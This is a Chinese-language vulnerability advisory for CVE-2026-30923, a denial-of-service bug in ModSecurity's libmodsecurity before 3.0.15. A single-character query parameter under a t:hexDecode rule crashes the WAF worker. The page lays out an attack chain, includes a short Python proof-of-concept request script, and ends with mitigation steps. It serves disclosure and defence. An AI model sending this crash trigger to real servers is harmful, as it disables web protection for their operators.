CVE-2026-30923 CVSS 7.5 高危

CVE-2026-30923 ModSecurity拒绝服务漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30923

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ModSecurity (libmodsecurity)

漏洞概述

ModSecurity的libmodsecurity组件存在安全漏洞。当使用t:hexDecode转换的规则检查仅含单个字符的查询字符串参数时，会触发段错误。攻击者可利用此漏洞无需认证即可远程发起攻击，导致WAF工作进程崩溃，造成拒绝服务。攻击停止后进程可自动恢复。该漏洞影响3.0.15之前的所有版本。

技术细节

该漏洞位于ModSecurity v3项目的核心组件libmodsecurity中。其根本原因是规则引擎在执行t:hexDecode（十六进制解码）转换函数时，未能正确处理特定的边界条件。具体而言，当WAF规则被配置为对查询字符串参数应用hexDecode转换，而传入的参数值恰好仅包含一个字符时，底层解码逻辑会产生错误，导致非法内存访问，进而引发段错误。鉴于该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:N，攻击者无需经过身份认证，也无须诱导用户交互，仅通过网络发送特制的恶意HTTP请求即可远程触发该漏洞。虽然工作进程在崩溃后通常会自动重启恢复服务，但在持续的高频攻击下，防护资源将被耗尽，导致Web应用防火墙功能失效，从而实现拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器使用了ModSecurity v3（libmodsecurity）作为WAF，且版本低于3.0.15。

STEP 2

构造请求

攻击者构造一个特制的HTTP GET请求，在查询字符串中包含一个单字符参数（例如 ?q=A）。

STEP 3

触发漏洞

当ModSecurity规则集对该参数应用t:hexDecode转换函数进行检查时，触发内部处理逻辑错误。

STEP 4

拒绝服务

libmodsecurity进程因段错误崩溃，导致WAF失效，服务暂时中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-30923
# Description: Trigger a segmentation fault in libmodsecurity by sending a query parameter with a single character.
# Requirement: The target WAF must have a rule inspecting the query string with the transformation function 't:hexDecode'.

target_url = "http://example.com/api"
# The payload is a single character. If a rule applies 't:hexDecode' to this parameter, it triggers the crash.
payload = {"input": "A"}

try:
    print("Sending payload to trigger the crash...")
    response = requests.get(target_url, params=payload, timeout=5)
    print(f"Status Code: {response.status_code}")
    print("Check if the WAF worker process has crashed.")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

ModSecurity (libmodsecurity) < 3.0.15

防御指南

临时缓解措施

如果无法立即升级，建议检查WAF规则集，暂时禁用对查询字符串参数使用t:hexDecode转换的规则，以降低被攻击的风险，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表